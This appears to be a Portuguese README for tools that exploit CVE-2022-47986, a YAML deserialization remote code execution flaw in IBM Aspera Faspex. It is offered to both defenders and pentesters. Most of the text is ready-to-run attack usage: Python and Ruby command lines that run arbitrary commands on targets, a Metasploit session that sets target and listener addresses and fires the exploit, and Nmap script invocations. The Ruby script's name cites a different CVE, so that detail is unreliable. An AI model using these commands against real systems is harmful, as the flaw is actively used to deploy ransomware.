
CVE-2022-47986: Módulos Python, Ruby, NMAP e Metasploit para explorar a vulnerabilidade.
Esta vulnerabilidade está sendo explorada ativamente. O IceFire usa esta vulnerabilidade para implantar o ransomware em sistemas visados, eu gostaria de ajudar as equipes de SOC/Blue Team a identificar os sistemas impactados e os Pentesters/Red Teams a explorá-la e reportá-la.
Proponho scripts puros em Python e Ruby, módulos do Metasploit e do Nmap para explorar a vulnerabilidade que causa uma RCE (Execução Remota de Código) no IBM Aspera Faspex a partir da desserialização de YAML.
python3 CVE-2022-47986.py <target> <command>
# OR
chmod u+x CVE-2022-47986.py
./CVE-2022-47986.py https://aspera.faspax.local id
ruby CVE-2021-31166.rb
ruby CVE-2021-31166.rb <hostname> -c <command>
ruby CVE-2021-31166.rb aspera.faspax.local -c id
msf6 > use exploit/linux/http/ibm_aspera_faspex_rce_yaml_deserialization
msf6 exploit(linux/http/ibm_aspera_faspex_rce_yaml_deserialization) > set RHOST 10.10.10.10
RHOST => 10.10.10.10
msf6 exploit(linux/http/ibm_aspera_faspex_rce_yaml_deserialization) > set LHOST 192.168.77.139
LHOST => 192.168.77.139
msf6 exploit(linux/http/ibm_aspera_faspex_rce_yaml_deserialization) > exploit
nmap -p 443 --script ibm-aspera-faspex-rce 172.17.0.2
nmap -p 443 --script ibm-aspera-faspex-rce --script-args "command=id" 172.17.0.2
Licenciado sob a GPL, versão 3.